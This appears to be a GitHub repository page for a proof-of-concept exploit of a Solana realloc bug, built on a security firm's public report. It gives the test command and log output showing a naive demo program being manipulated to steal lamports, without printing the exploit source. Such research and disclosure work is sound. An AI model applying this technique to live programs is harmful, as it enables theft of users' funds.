Skip to content

Arrowana/realloc-bug-exploit-poc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Solana realloc bug exploit POC

Based on the comprehensive report from osec

https://twitter.com/osec_io/status/1601371947794804737

The rekt cloud program is a naive program which allows storage of arbitrary data, the first 32 bytes are used to the store the authority allowed to write or resize the storage.

It allows batching actions, which is essential to exit the instruction while still satisfying the runtime checks.

It makes it a simple to understand candidate to try to leverage the flaw and exploit it. Ensuring rent exemption is left to the user to simplify the program.

Somehow test have to be run in the root with BPF_OUT_DIR=$(pwd)/target/deploy cargo test-bpf -- --nocapture otherwise it loads the native runtime which is badly broken

Manipulate lamport fields to steal lamports from an unexpected program owned account

programs/rekt-cloud/tests/test_rekt.rs

[2022-12-11T05:33:09.931917557Z DEBUG solana_runtime::message_processor::stable_log] Program log: Welcome to Rekt cloud
...
[2022-12-11T05:33:09.989084403Z DEBUG solana_runtime::message_processor::stable_log] Program log: Initializing G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.992174651Z DEBUG solana_runtime::message_processor::stable_log] Program log: Resizing G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.995091090Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing to G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.996112170Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing at 10384, original data: [0, 196, 230, 158, 1, 0, 0, 0]
[2022-12-11T05:33:09.998725147Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing to G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:09.999703979Z DEBUG solana_runtime::message_processor::stable_log] Program log: Writing at 1020720, original data: [0, 0, 0, 0, 0, 0, 0, 0]
[2022-12-11T05:33:10.002209378Z DEBUG solana_runtime::message_processor::stable_log] Program log: Resizing G2ydLrkb73SS51q7UCVkNoWbf4ecSho2xU2NCkADtFMN...
[2022-12-11T05:33:10.002296729Z DEBUG solana_runtime::message_processor::stable_log] Program log: See you later!
...
Stolen lamports: 6960890880

Manipulate program owned account data

TODO

Remote code execution

Not possible

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages